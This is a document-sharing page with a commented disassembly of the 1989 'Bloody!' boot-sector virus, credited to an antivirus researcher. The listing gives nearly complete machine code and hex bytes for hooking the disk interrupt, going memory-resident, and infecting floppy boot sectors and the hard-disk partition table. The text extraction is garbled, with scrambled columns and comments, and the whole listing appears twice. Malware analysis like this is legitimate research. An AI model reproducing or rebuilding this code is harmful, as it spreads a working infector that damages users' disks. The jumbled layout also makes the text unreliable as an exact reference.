Bloody
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Bloody as PDF for free.
More details
- Words: 1,323
- Pages: 5
; ; ; ; ; ; ;
bloody! virus discovered an commented by ferenc leitold hungarian virusbuster team address: 1399 budapest p.o. box 701/349 hungary
217d:0100 217d:0105
2eff2e177c e9b500
jmp jmp
217d:0108 217d:0109 217d:010a
00 00 00
db db db
far cs:[7c17] 01bd ; jump to main entry point 0 0 0
; counter ; ;
; flag: 00 : floppy 80 : hard disk
217d:010b
00
db
0
217d:010c
a100f0
mov
217d:010f
0301809f
dw
0103h,9f80h
; entry point at top
217d:0113
007c0000
dw
7c00h,0000h
; address of orig. boot
217d:0117
057c0000
dw
7c05h,0000h
217d:011b
00000000
dw
0000h,0000h
ax,[f000]
; original int13 vector
;************************ int13 entry point ***************************** 217d:011f 217d:0122 217d:0124 217d:0127 217d:0129 217d:012c 217d:012e 217d:0131
80fc02 720d 80fc04 7308 80fa80 7303 e80500 2eff2e0b00
cmp jc cmp jnc cmp jnc call jmp
ah,02 ; check parameters 0131 ah,04 0131 dl,80 0131 0136 ; call, if ah=2,3 & dl!=80 far cs:[000b] ; jump to original int13
217d:0136 217d:0137 217d:0138 217d:0139 217d:013a 217d:013b 217d:013c 217d:013d
50 53 51 52 06 1e 56 57
push push push push push push push push
ax bx cx dx es ds si di
; save registers
217d:013e 217d:013f 217d:0140 217d:0141
0e 1f 0e 07
push pop push pop
cs ds cs es
; set ds,es to cs
217d:0142
be0200
mov
si,0002 ; 2 probe
217d:0145 217d:0147
33c0 9c
xor pushf
ax,ax
; reset drive
217d:0148 217d:014c 217d:014f 217d:0152 217d:0155 217d:0157 217d:0158 217d:015c 217d:015e 217d:015f 217d:0161
ff1e0b00 b80102 bb0002 b90100 32f6 9c ff1e0b00 7305 4e 75e4 eb2e
call mov mov mov xor pushf call jnc dec jnz jmp
far [000b] ; call int13 ax,0201 ; read boot sector of floppy bx,0200 cx,0001 dh,dh
217d:0163 217d:0165 217d:0168 217d:016b 217d:016c 217d:016e
33f6 bf0002 b90300 fc f3a7 7421
xor mov mov cld rep jz
si,si ; check boot sector, if di,0200 ; if infected yet cx,0003
217d:0170 217d:0173 217d:0176 217d:0179 217d:017b 217d:017c 217d:0180
b80103 bb0002 b90300 b601 9c ff1e0b00 720f
mov mov mov mov pushf call jc
ax,0301 ; write orig. boot sector bx,0200 cx,0003 ; cyl: 0 sect: 3 dh,01 ; head: 1
217d:0182 217d:0185 217d:0187 217d:018a 217d:018c 217d:018d
b80103 33db b90100 32f6 9c ff1e0b00
mov xor mov xor pushf call
ax,0301 ; write infected boot sector bx,bx cx,0001 ; cyl:0 sect:1 dh,dh ; head: 0
217d:0191 217d:0192 217d:0193 217d:0194 217d:0195 217d:0196 217d:0197 217d:0198 217d:0199
5f 5e 1f 07 5a 59 5b 58 c3
pop pop pop pop pop pop pop pop ret
di si ds es dx cx bx ax
217d:019a 217d:01a0 217d:01a6 217d:01ac 217d:01b2 217d:01b8
1d1d1d1a3737 37373737557b 7878736e3637 5d6279393723 3b37262e2f2e 1d1d1d1a00
far [000b] ; call int13 0163 si ; if error next probe 0145 0191 ; jump, if 2 bad probes was
cmpsw 0191
; jump, if already infected
far [000b] 0191
; call int13
far [000b] ; restore registers
; coded text: ; "\r\r\r\n bloody! jun. 4, 1989\r\r\r\n"
;************************** main entry point ******************************* 217d:01bd 217d:01bf 217d:01c1 217d:01c2 217d:01c4
33c0 8ed8 fa 8ed0 bc007c
xor mov cli mov mov
ax,ax ds,ax ss,ax sp,7c00
217d:01c7
fb
sti
217d:01c8 217d:01cb 217d:01ce 217d:01d1
a14c00 a30b7c a14e00 a30d7c
mov mov mov mov
ax,[004c] [7c0b],ax ax,[004e] [7c0d],ax
; save orig. int13 vector
217d:01d4 217d:01d7 217d:01d8 217d:01d9
a11304 48 48 a31304
mov dec dec mov
ax,[0413] ax ax [0413],ax
; decrease memory by 2kb
217d:01dc 217d:01de 217d:01e0
b106 d3e0 a3117c
mov shl mov
cl,06 ax,cl [7c11],ax
; calculate segment
217d:01e3 217d:01e6 217d:01e8 217d:01eb
a34e00 8ec0 b81f00 a34c00
mov mov mov mov
[004e],ax es,ax ax,001f [004c],ax
; set new int13 vector
217d:01ee
c7060f7c0301
mov
[7c0f],0103 ; to top
; set jmp argument points
217d:01f4 217d:01f7 217d:01f9 217d:01fc 217d:01fd 217d:01ff
be007c 33ff b90001 fc f3a5 ff2e0f7c
mov xor mov cld rep jmp
si,7c00 ; copy itself to top di,di cx,0100
top :0203 top :0205
33c0 cd13
xor int
ax,ax 13
top top top top top top top top
0e 1f 33c0 8ec0 b80102 bb007c 803e0a0000 7435
push pop xor mov mov mov cmp jz
cs ds ; ax,ax es,ax ax,0201 bx,7c00 [000a],00 024f
top top top top top top top top top top
:0207 :0208 :0209 :020b :020d :0210 :0213 :0218
:021a :021d :0220 :0222 :0223 :0224 :0228 :022d :022f :0234
b90600 ba8000 cd13 0e 07 fe060800 803e080080 721e c60608007a fc
mov mov int push pop inc cmp jc mov cld
movsw far [7c0f]
; jmp to top ; reset drive ; set registers to load original sector
; check, if it is floppy ? ; jump, if floppy
; if hard disk, load ; orig. part. table cx,0006 ; cyl.: 0 sect.: 6 dx,0080 ; head: 0 13 cs es b/[0008] ; increase counter [0008],80 024d ; if counter < 128 -> no text [0008],7a
top top top top top top top top top
:0235 :0238 :0239 :023b :023d :0241 :0243 :0245 :0247
be9a00 ac 3c00 740c 32060300 b40e b700 cd10 ebef
mov lodsb cmp jz xor mov mov int jmp
si,009a ; write coded text via bios
top :0249 top :024b top :024d
b400 cd16 eb54
mov int jmp
ah,00 16 02a3
top :024f top :0252 top :0255
b90300 ba0001 cd13
mov mov int
; if floppy cx,0003 ; read orig. boot sector dx,0100 ; cyl: 0 hd: 1 sect: 3 13
top :0257 top :0258 top :0259
0e 07 721d
push pop jc
cs es 0278
top top top top top top
:025b :025e :0261 :0264 :0267 :0269
b80102 bb0002 b90100 ba8000 cd13 720d
mov mov mov mov int jc
ax,0201 ; load part. table of bx,0200 ; 1st hard disk cx,0001 dx,0080 13 0278 ; jump, if error occured
top top top top top top
:026b :026e :0270 :0273 :0274 :0276
be0002 33ff b90300 fc f3a7 750e
mov xor mov cld rep jnz
si,0200 ; check 1st 3 word di,di cx,0003
top :0278 top :027d top :0282
c6060a0000 c606080000 ff2e1300
mov mov jmp
; if infected [000a],00 ; [0008],00 ; far [0013] ;
top top top top top
:0286 :0289 :028c :028f :0291
b80103 bb0002 b90600 cd13 72e5
mov mov mov int jc
ax,0301 ; write orig. part. table bx,0200 cx,0006 ; cyl: 0 sect: 6 hd: 0 13 0278
top top top top top
:0293 :0296 :0299 :029c :029e
bebe03 bfbe01 b92101 f3a5 c6060a0001
mov mov mov rep mov
si,03be ; copy partition info di,01be ; after virus body cx,0121 movsw [000a],01
b80103
mov
ax,0301 ; write boot sector or ; partition table with ; increased counter
top :02a3
al,00 0249 al,[0003] ah,0e bh,00 10 0238 ; wait for keystroke
; jump, if error occured
cmpsw 0286 yet set flag to 0 reset counter jump to orig. boot
top :02a6 top :02a8 top :02ab
33db b90100 cd13
xor mov int
bx,bx cx,0001 13
top top top top top
:02ad :02b0 :02b3 :02b6 :02b8
bebe04 bfbe01 b92000 f3a5 ebbe
mov mov mov rep jmp
top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top
:02ba :02bc :02be :02c0 :02c2 :02c4 :02c6 :02c8 :02ca :02cc :02ce :02d0 :02d2 :02d4 :02d6 :02d8 :02da :02dc :02de :02e0 :02e2 :02e4 :02e6 :02e8 :02ea :02ec :02ee :02f0 :02f2 :02f4 :02f6 :02f8 :02fa :02fc :02fe :02ff
de07 df07 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 55 aa
esc esc add add add add add add add add add add add add add add add add add add add add add add add add add add add add add add add add push stosb
si,04be ; clear area of partition di,01be ; info cx,0020 movsw 0278 ; set parameters & ; jump to orig. boot 30,[bx] 38,[bx] [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al bp
bloody! virus discovered an commented by ferenc leitold hungarian virusbuster team address: 1399 budapest p.o. box 701/349 hungary
217d:0100 217d:0105
2eff2e177c e9b500
jmp jmp
217d:0108 217d:0109 217d:010a
00 00 00
db db db
far cs:[7c17] 01bd ; jump to main entry point 0 0 0
; counter ; ;
; flag: 00 : floppy 80 : hard disk
217d:010b
00
db
0
217d:010c
a100f0
mov
217d:010f
0301809f
dw
0103h,9f80h
; entry point at top
217d:0113
007c0000
dw
7c00h,0000h
; address of orig. boot
217d:0117
057c0000
dw
7c05h,0000h
217d:011b
00000000
dw
0000h,0000h
ax,[f000]
; original int13 vector
;************************ int13 entry point ***************************** 217d:011f 217d:0122 217d:0124 217d:0127 217d:0129 217d:012c 217d:012e 217d:0131
80fc02 720d 80fc04 7308 80fa80 7303 e80500 2eff2e0b00
cmp jc cmp jnc cmp jnc call jmp
ah,02 ; check parameters 0131 ah,04 0131 dl,80 0131 0136 ; call, if ah=2,3 & dl!=80 far cs:[000b] ; jump to original int13
217d:0136 217d:0137 217d:0138 217d:0139 217d:013a 217d:013b 217d:013c 217d:013d
50 53 51 52 06 1e 56 57
push push push push push push push push
ax bx cx dx es ds si di
; save registers
217d:013e 217d:013f 217d:0140 217d:0141
0e 1f 0e 07
push pop push pop
cs ds cs es
; set ds,es to cs
217d:0142
be0200
mov
si,0002 ; 2 probe
217d:0145 217d:0147
33c0 9c
xor pushf
ax,ax
; reset drive
217d:0148 217d:014c 217d:014f 217d:0152 217d:0155 217d:0157 217d:0158 217d:015c 217d:015e 217d:015f 217d:0161
ff1e0b00 b80102 bb0002 b90100 32f6 9c ff1e0b00 7305 4e 75e4 eb2e
call mov mov mov xor pushf call jnc dec jnz jmp
far [000b] ; call int13 ax,0201 ; read boot sector of floppy bx,0200 cx,0001 dh,dh
217d:0163 217d:0165 217d:0168 217d:016b 217d:016c 217d:016e
33f6 bf0002 b90300 fc f3a7 7421
xor mov mov cld rep jz
si,si ; check boot sector, if di,0200 ; if infected yet cx,0003
217d:0170 217d:0173 217d:0176 217d:0179 217d:017b 217d:017c 217d:0180
b80103 bb0002 b90300 b601 9c ff1e0b00 720f
mov mov mov mov pushf call jc
ax,0301 ; write orig. boot sector bx,0200 cx,0003 ; cyl: 0 sect: 3 dh,01 ; head: 1
217d:0182 217d:0185 217d:0187 217d:018a 217d:018c 217d:018d
b80103 33db b90100 32f6 9c ff1e0b00
mov xor mov xor pushf call
ax,0301 ; write infected boot sector bx,bx cx,0001 ; cyl:0 sect:1 dh,dh ; head: 0
217d:0191 217d:0192 217d:0193 217d:0194 217d:0195 217d:0196 217d:0197 217d:0198 217d:0199
5f 5e 1f 07 5a 59 5b 58 c3
pop pop pop pop pop pop pop pop ret
di si ds es dx cx bx ax
217d:019a 217d:01a0 217d:01a6 217d:01ac 217d:01b2 217d:01b8
1d1d1d1a3737 37373737557b 7878736e3637 5d6279393723 3b37262e2f2e 1d1d1d1a00
far [000b] ; call int13 0163 si ; if error next probe 0145 0191 ; jump, if 2 bad probes was
cmpsw 0191
; jump, if already infected
far [000b] 0191
; call int13
far [000b] ; restore registers
; coded text: ; "\r\r\r\n bloody! jun. 4, 1989\r\r\r\n"
;************************** main entry point ******************************* 217d:01bd 217d:01bf 217d:01c1 217d:01c2 217d:01c4
33c0 8ed8 fa 8ed0 bc007c
xor mov cli mov mov
ax,ax ds,ax ss,ax sp,7c00
217d:01c7
fb
sti
217d:01c8 217d:01cb 217d:01ce 217d:01d1
a14c00 a30b7c a14e00 a30d7c
mov mov mov mov
ax,[004c] [7c0b],ax ax,[004e] [7c0d],ax
; save orig. int13 vector
217d:01d4 217d:01d7 217d:01d8 217d:01d9
a11304 48 48 a31304
mov dec dec mov
ax,[0413] ax ax [0413],ax
; decrease memory by 2kb
217d:01dc 217d:01de 217d:01e0
b106 d3e0 a3117c
mov shl mov
cl,06 ax,cl [7c11],ax
; calculate segment
217d:01e3 217d:01e6 217d:01e8 217d:01eb
a34e00 8ec0 b81f00 a34c00
mov mov mov mov
[004e],ax es,ax ax,001f [004c],ax
; set new int13 vector
217d:01ee
c7060f7c0301
mov
[7c0f],0103 ; to top
; set jmp argument points
217d:01f4 217d:01f7 217d:01f9 217d:01fc 217d:01fd 217d:01ff
be007c 33ff b90001 fc f3a5 ff2e0f7c
mov xor mov cld rep jmp
si,7c00 ; copy itself to top di,di cx,0100
top :0203 top :0205
33c0 cd13
xor int
ax,ax 13
top top top top top top top top
0e 1f 33c0 8ec0 b80102 bb007c 803e0a0000 7435
push pop xor mov mov mov cmp jz
cs ds ; ax,ax es,ax ax,0201 bx,7c00 [000a],00 024f
top top top top top top top top top top
:0207 :0208 :0209 :020b :020d :0210 :0213 :0218
:021a :021d :0220 :0222 :0223 :0224 :0228 :022d :022f :0234
b90600 ba8000 cd13 0e 07 fe060800 803e080080 721e c60608007a fc
mov mov int push pop inc cmp jc mov cld
movsw far [7c0f]
; jmp to top ; reset drive ; set registers to load original sector
; check, if it is floppy ? ; jump, if floppy
; if hard disk, load ; orig. part. table cx,0006 ; cyl.: 0 sect.: 6 dx,0080 ; head: 0 13 cs es b/[0008] ; increase counter [0008],80 024d ; if counter < 128 -> no text [0008],7a
top top top top top top top top top
:0235 :0238 :0239 :023b :023d :0241 :0243 :0245 :0247
be9a00 ac 3c00 740c 32060300 b40e b700 cd10 ebef
mov lodsb cmp jz xor mov mov int jmp
si,009a ; write coded text via bios
top :0249 top :024b top :024d
b400 cd16 eb54
mov int jmp
ah,00 16 02a3
top :024f top :0252 top :0255
b90300 ba0001 cd13
mov mov int
; if floppy cx,0003 ; read orig. boot sector dx,0100 ; cyl: 0 hd: 1 sect: 3 13
top :0257 top :0258 top :0259
0e 07 721d
push pop jc
cs es 0278
top top top top top top
:025b :025e :0261 :0264 :0267 :0269
b80102 bb0002 b90100 ba8000 cd13 720d
mov mov mov mov int jc
ax,0201 ; load part. table of bx,0200 ; 1st hard disk cx,0001 dx,0080 13 0278 ; jump, if error occured
top top top top top top
:026b :026e :0270 :0273 :0274 :0276
be0002 33ff b90300 fc f3a7 750e
mov xor mov cld rep jnz
si,0200 ; check 1st 3 word di,di cx,0003
top :0278 top :027d top :0282
c6060a0000 c606080000 ff2e1300
mov mov jmp
; if infected [000a],00 ; [0008],00 ; far [0013] ;
top top top top top
:0286 :0289 :028c :028f :0291
b80103 bb0002 b90600 cd13 72e5
mov mov mov int jc
ax,0301 ; write orig. part. table bx,0200 cx,0006 ; cyl: 0 sect: 6 hd: 0 13 0278
top top top top top
:0293 :0296 :0299 :029c :029e
bebe03 bfbe01 b92101 f3a5 c6060a0001
mov mov mov rep mov
si,03be ; copy partition info di,01be ; after virus body cx,0121 movsw [000a],01
b80103
mov
ax,0301 ; write boot sector or ; partition table with ; increased counter
top :02a3
al,00 0249 al,[0003] ah,0e bh,00 10 0238 ; wait for keystroke
; jump, if error occured
cmpsw 0286 yet set flag to 0 reset counter jump to orig. boot
top :02a6 top :02a8 top :02ab
33db b90100 cd13
xor mov int
bx,bx cx,0001 13
top top top top top
:02ad :02b0 :02b3 :02b6 :02b8
bebe04 bfbe01 b92000 f3a5 ebbe
mov mov mov rep jmp
top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top top
:02ba :02bc :02be :02c0 :02c2 :02c4 :02c6 :02c8 :02ca :02cc :02ce :02d0 :02d2 :02d4 :02d6 :02d8 :02da :02dc :02de :02e0 :02e2 :02e4 :02e6 :02e8 :02ea :02ec :02ee :02f0 :02f2 :02f4 :02f6 :02f8 :02fa :02fc :02fe :02ff
de07 df07 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 55 aa
esc esc add add add add add add add add add add add add add add add add add add add add add add add add add add add add add add add add push stosb
si,04be ; clear area of partition di,01be ; info cx,0020 movsw 0278 ; set parameters & ; jump to orig. boot 30,[bx] 38,[bx] [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al [bx+si],al bp
Related Documents
Bloody
November 2019 28
Bloody
December 2019 19
Bloody Report
June 2020 7
Bloody Death
November 2019 15
Sittwe Bloody Rice Riot
May 2020 16